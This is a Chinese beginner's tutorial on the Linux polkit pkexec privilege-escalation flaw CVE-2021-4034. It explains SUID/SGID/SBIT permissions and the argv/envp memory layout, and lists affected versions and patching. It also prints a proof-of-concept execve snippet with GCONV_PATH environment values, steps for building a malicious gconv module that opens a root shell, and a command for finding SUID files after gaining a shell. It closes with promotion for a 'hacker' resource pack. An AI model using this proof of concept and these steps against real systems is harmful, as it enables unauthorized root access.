【网络安全零基础入门必知必会】之CVE-2021-4034漏洞原理解析（非常详细）零基础入门到精通，收藏这一篇就够了2

这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段远程代码执行渗透与防御第2篇。

喜欢的朋友们，记得给大白点赞支持和收藏一下，关注我，学习黑客技术。

本篇文章主要叙述CVE-2021-4034漏洞，该漏洞影响的linux发行版众多，例如：Ubuntu、CentOS、Debian等等，该漏洞为Linux系统本地提权漏洞，利用脚本已经公开，利用简单且稳定，脚本地址：Github

当攻击者获取目标系统普通用户权限时，利用该脚本即可直接获得root权限，该漏洞的主要原因是因为polkit中的pkexec程序对参数个数判断不佳，导致数组溢出，具体分析过程将在下面慢慢介绍。首先得先了解下suid、sgid、sbit的特殊权限，将对后面分析起到帮助，也对后续的渗透学习开辟一些新鲜道路。

一、SUID、SGID、SBIT的介绍

suid、sgid、sbit是文件权限管理的特殊命令，基本的Linux权限为9个，分别为rwx rwx rwx，利用命令ll -a
加文件路径会发现有一些特殊的权限位符号。

Linux有十二个权限符 ：

1. SUID的基本权限位有x权限，标识符为s，代表数字为4，生效对象为用户位

2. SGID的基本权限位有x权限，标识符为s，代表数字为2，生肖对象为用户组位

3. SBIT的基本权限位有x权限，标识符为t，代表数字为1，生效对象为其他用户

1）SUID权限位

1. suid通过s字符标识判定，当s出现在文件所有者的x权限时，如上图/usr/bin/passwd文件，状态位：-rwsr-xr-x，此时就可以判定为时suid。

2. suid权限仅对二进制程序有效

3. 该权限仅在执行该程序的过程中有效

4. 执行者将拥有该程序拥有者的权限

**SUID的目的 ：**为了让本来没有相应权限的用户运行这个程序，可以短暂的享有该程序拥有者的权限。就比如上方图例，

/usr/bin/passwd
该二进制程序是用来修改密码的，但是linux系统中用户众多，有root、普通用户等等，这些用户都需要在特殊情况修改密码，比如在忘记 登录密码时 。

具体流程 ：

1. 因为passwd的权限对任何用户都是可执行的，所以系统中不管什么用户都可执行

2. passwd文件的拥有者是属于root

3. 当普通用户在执行passwd命令时，会在执行期间短暂拥有root权限

4. 普通用户借助root权限修改了/etc/shadow文件

5. 最后把密码修改成功

6. 这时候，在攻击者的角度，就可以利用此类拥有者为root的二进制程序，提权成功

注 ： 当在渗透过程中获取了shell ，可以使用find命令查询系统上所有的s权限位文件，命令：
find / -perm -4000 -type f -ls

参数解释：

-perm：利用权限进制搜索
-type：指定文件类型（l：软连接类型；d：文件夹类型；f：文件类型）
-ls：搜索的数据进行格式化输出
-delete：对匹配的数据进行删除

2）SGID权限位

1. sgid和suid差不多，先查看s是否在所属用户组的x位置上，如果在，那就是sgid

2. sgid获得该程序所属用户组的权限

3. sgid仅对二进制程序有用

4. sgid主要用在目录上

注 ：sgid，如果用户在此目录下具有w，写的权限的话，若使用者在此目录下建立新文件，则新文件的群组与此目录的群组相同。

3）SBIT权限位

1. sbit主要针对other来设置的，和suid，sgid大同小异，只是功能上不同而已

2. sbit只对目录有效，当用户在该目录下新建文件或目录时，仅自己和root才有权利删除

3. 最具代表的就是/tmp目录，之前在渗透项目中，获得了webshell，都要先进到/tmp目录下进行一系列下载之类的操作，因为/tmp目录，任何人都可以增加、修改文件（权限为rwx）

注 ：SBIT对文件不起作用

总结

二、CVE-2021-4034

这里是学习了看雪论坛的某位大佬对该漏洞的整体分析，然后自己理解进行叙述！实例也是该大佬的例子。

1）相关知识

1、实例代码：

#include<stdio.h>  
int main(int argc, char** argv){  
	printf("argc:%d\n", argc);  
	for(int i;i<argc;i++){  
		printf("%s\n",argv[i]);  
	}  
	return 0;  
}  
  

1
2
3
4
5
6
7
8
9
10

上述代码中，argc是参数个数，argv是存放的具体参数，argv[0]—>程序本身，argv[1]—>第一个参数，argv[2]—>第二个参数，argv[argc]，0表示结束。

• 当执行程序时，argc的取值至少为1，因为即使不加参数，argv[0]也要指向程序路径本身。pkexec在特殊情况下，如使用execve来调用程序，并给argv传值 NULL，则argc为0。

• execve函数：

• #include<unistd.h>
  int execve(const char *pathname, char *const argv[], char *const envp[]);

• execve.c:

• #include<unistd.h>
  int main(int argc, char **argv){
  return execve(“./test”, NULL, NULL);
  }

注 ：argv和envp在内存中的分布是连续的。

• execve.c:
  #include<unistd.h>
  int main(){
  char* const argv[] = {
  “AAAAAA1111”,
  “AAAAAA1111”,
  “AAAAAA1111”,
  NULL
  };
  char* const envp[] = {
  “AAAAAA1111”,
  “AAAAAA1111”,
  “AAAAAA1111”,
  NULL
  };
  return execve(“./test”, argv, envp);
  }

• 利用execve调用test，将上述三个值分别传入argv和envp中

• #include<stdio.h>
  int main(int argc, char** argv)
  {
  printf(“argc: %d\n”, argc);
  for(int i; i<8; i++) {
  if(argv[i]!=NULL) {
  printf(“argv[%d]: %s\n”, i, argv[i]);
  } else {
  printf(“argv[%d]: NULL\n”, i);
  }
  }
  return 0;
  1
  }

• argc为3，加上截止符0，argv的大小为4，这里直接打印了8个值，显然是越界了，通过实例，表明argv与envp在内存布局上是连续的，envp紧跟argv之后。
  具体分析过程请参考本文最后 （大佬分析的特别完善，受益匪浅）

2）漏洞原理

本漏洞主要被利用的包括以下几点：

1. pkexec为 suid 程序

2. 当argc为0时，pkexec会读取argv[1]变量，而由于刚才实例分析，内存布局是连续的，因此实际上会读取到第一个环境变量。

3. 读取到argv[1]之后，若其不是绝对路径，则pkexec会将其理解为相对路径，会在环境变量中查找PATH变量，将其转换为实际路径。

4. 若PATH环境变量包含一个攻击者可控的路径，则pkexec转换后的实际路径将会是这个攻击者可控的路径下的一个子目录，则显然此实际路径也是攻击者可控的。例如： /bin/sh 、 PATH=/bin:/usr/bin

5. pkexec会对argv[1]赋值，将其修改为上述得到的实际路径，但是argv[1]此时实际上指向的是pkexec的第一个环境变量，也就是说，pkexec将自己的第一个环境变量修改为这个实际路径了。

6. pkexec会在程序运行过程中调用g_printerr函数，这个函数会在运行的时候按需载入GCONV_PATH环境变量指向的路径下的gconv-modules文件中写明的外部动态链接库（so），并运行其中的初始化函数gconv_init。
   攻击者可以做以下操作提升至root权限：

#include <unistd.h>  
  
int main(int argc, char **argv)  
{  
	char * const args[] = {  
		NULL  
	};  
	char * const environ[] = {  
		"pwnkit.so:.",  
		"PATH=GCONV_PATH=.",  
		"SHELL=/lol/i/do/not/exists",  
		"CHARSET=PWNKIT",  
		"GIO_USE_VFS=",  
		NULL  
	};  
	return execve("/usr/bin/pkexec", args, environ);  
}  
  

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

这是CVE-2021-4034的poc，将其复制到目标机器/tmp目录下，编译运行，赋权chmod u+s，然后执行即可利用suid特殊权限，获得root权限。

或者可以：

• 在自己可控的目录下生成一个gconv-modules文件，并将文件内容设置为指向某个so文件。

• 在so文件中实现gconv_init函数，此函数主要就是生成一个root shell（由于pkexec默认开启SUID），而在so库的此函数中，设置当前进程用户的uid为0，即可提权到root用户。

• 调用pkexec，而且在调用的时候通过命令行参数设置使得pkexec得到的argc为0，将环境变量中的第一个设置为非/开头的一个相对路径，将环境变量中的PATH变量的值设置为GCONV_PATH=开头的字符串，使得对应的路径指向上述存储gconv-modules文件的路径。

3）影响版本

主要有：pkexec版本为0.105之前

• Ubuntu 20.04 LTS：policykit-1 - 0.105-26ubuntu1.2

• Ubuntu 18.04 LTS：policykit-1 - 0.105-20ubuntu0.18.04.6

• Ubuntu 16.04 ESM：policykit-1 - 0.105-14.1ubuntu0.5+esm1

• Ubuntu 14.04 ESM：policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

• CentOS 6：polkit-0.96-11.el6_10.2

• CentOS 7：polkit-0.112-26.el7_9.1

三、修复

目前各大linux发行版都给出了安全补丁，升级即可修复该漏洞。

漏洞参考：https://bbs.pediy.com/thread-271423.htm#msg_header_h2_6

网络安全学习包

资料目录

1. 成长路线图&学习规划

2. 配套视频教程

3. SRC&黑客文籍

4. 护网行动资料

5. 黑客必读书单

6. 面试题合集

282G《网络安全/黑客技术入门学习大礼包》，可以扫描下方二维码免费领取！

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

朋友们需要全套共282G的《网络安全/黑客技术入门学习大礼包》，可以扫描下方二维码免费领取！

本文转自 https://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247499086&idx=1&sn=c45a3a7054f00a28a69f5932284e6a4e&chksm=ce9c3d86f9ebb4907712d57b7bc3d469ae1214761b3d2b8349a65096967b7b5f0c65f5ff6239&token=842539593&lang=zh_CN#rd，如有侵权，请联系删除。